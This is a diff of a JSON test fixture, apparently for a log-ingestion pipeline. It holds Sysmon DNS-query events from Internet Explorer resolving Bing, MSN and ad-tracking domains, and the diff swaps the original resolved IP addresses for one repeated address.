{ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -724,7 +724,7 @@ "ProcessId": "2736", "QueryName": "g.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "time_created": "2019-07-18T03:34:03.028Z", @@ -750,7 +750,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -770,7 +770,7 @@ "ProcessId": "2736", "QueryName": "lg3.media.net", "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.427", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -787,7 +787,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -802,7 +802,7 @@ "time_created": "2019-07-18T03:34:03.029Z", "level": "information", "event_data": { - "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;", + "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.469", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -866,7 +866,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -893,7 +893,7 @@ "ProcessId": "2736", "QueryName": "sb.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;", + "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.485", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -905,7 +905,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -930,7 +930,7 @@ "version": 5, "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;", + "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.500", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1024,7 +1024,7 @@ { "@timestamp": "2021-05-05T15:30:51.695Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1045,7 +1045,7 @@ "ProcessId": "2736", "QueryName": "ping.chartbeat.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1079,7 +1079,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.628", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1093,7 +1093,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 